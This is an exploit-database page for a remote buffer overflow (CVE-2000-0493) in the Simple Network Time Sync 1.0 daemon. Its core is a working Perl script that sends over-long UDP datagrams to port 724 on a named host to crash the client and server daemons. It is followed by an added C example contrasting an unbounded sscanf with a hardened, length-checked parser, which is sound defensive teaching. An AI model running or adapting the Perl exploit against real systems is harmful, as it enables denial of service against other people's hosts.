Exploit Atrus Trivalie Productions Simple Network Time Sync 1.0 - daemon Buffer Overflow

Exploiter

Hacker
18 Dec 2022
EDB-ID
19978
EDB verification
  1. Passed
Author
BEN TAYLOR
Vulnerability type
REMOTE
Platform
LINUX
CVE
CVE-2000-0493
Publication date
2000-06-01
Code:
source: https://www.securityfocus.com/bid/1289/info

A scanf overflow has been discovered in the Simple Network Time Sync daemon and client version 1.0. Currently the buffer overflow has been tested on RedHat 6.1. It may be possible to obtain root, although it appears one only has 50 characters to run code with.

#!/usr/bin/perl -w
#
# Usage: ./kill_sntsd <hostname>
#

use Socket;

# Needs to send 2 packets to kill the client and the server daemons
send_packet();
send_packet();

sub send_packet {

$proto = getprotobyname('udp');
$localaddr = gethostbyname("localhost") || die "error: $!\n";
$iaddr = gethostbyname($ARGV[0]) || die "$!\n";
$sin = sockaddr_in(724, $iaddr);
$paddr = sockaddr_in(53, $localaddr);
socket(SH, PF_INET, SOCK_DGRAM, $proto);
bind(SH, $paddr);

$|=1;

connect(SH, $sin) || die "$!\n";

# A string longer than 50 characters...
print SH "logistixlogistixlogistixlogistixlogistixlogistixlogistix\n";
close(SH);

}
 
Source
www.exploit-db.com
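
The bug class named in the description (an unbounded scanf conversion into a roughly 50-byte buffer), shown beside a bounded form that rejects over-long input. This is an added example, not code from the original post or from the Simple Network Time Sync source, which is not shown on this page. FIELD_MAX, parse_unbounded and parse_bounded are hypothetical names, and the 50-byte buffer size is an assumption taken from the "50 characters" in the description.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define FIELD_MAX 50 /* assumption: buffer size taken from the page's "50 characters" */

/* Vulnerable pattern, shown for contrast and never called: "%s" carries no
 * width, so a token of FIELD_MAX bytes or more is written past out[]. */
int parse_unbounded(const char *text, char out[FIELD_MAX])
{
    return sscanf(text, "%s", out);
}

/* Hardened form: copy the datagram into a NUL-terminated scratch buffer,
 * bound the conversion to FIELD_MAX-1 bytes, and use %n to see where it
 * stopped. A token cut short by the width is rejected, not truncated.
 * Returns 0 on success, -1 on empty, oversized or over-long input. */
int parse_bounded(const char *dgram, size_t len, char out[FIELD_MAX])
{
    char copy[512];
    int used = 0;

    if (len == 0 || len >= sizeof copy)
        return -1;
    memcpy(copy, dgram, len); /* UDP payloads are not NUL-terminated */
    copy[len] = '\0';

    if (sscanf(copy, "%49s%n", out, &used) != 1)
        return -1;
    if (copy[used] != '\0' && !isspace((unsigned char)copy[used]))
        return -1; /* conversion stopped at the width limit, not at a delimiter */
    return 0;
}

int main(void)
{
    /* Constructed inputs: a short field and the 56-byte line from the page. */
    const char *ok = "logistix\n";
    const char *bad = "logistixlogistixlogistixlogistixlogistixlogistixlogistix\n";
    char field[FIELD_MAX];

    printf("short: %d\n", parse_bounded(ok, strlen(ok), field));
    printf("long:  %d\n", parse_bounded(bad, strlen(bad), field));
    return 0;
}
```

The width in "%49s" must stay one less than FIELD_MAX, because scanf writes the terminating NUL in addition to the bytes it converts.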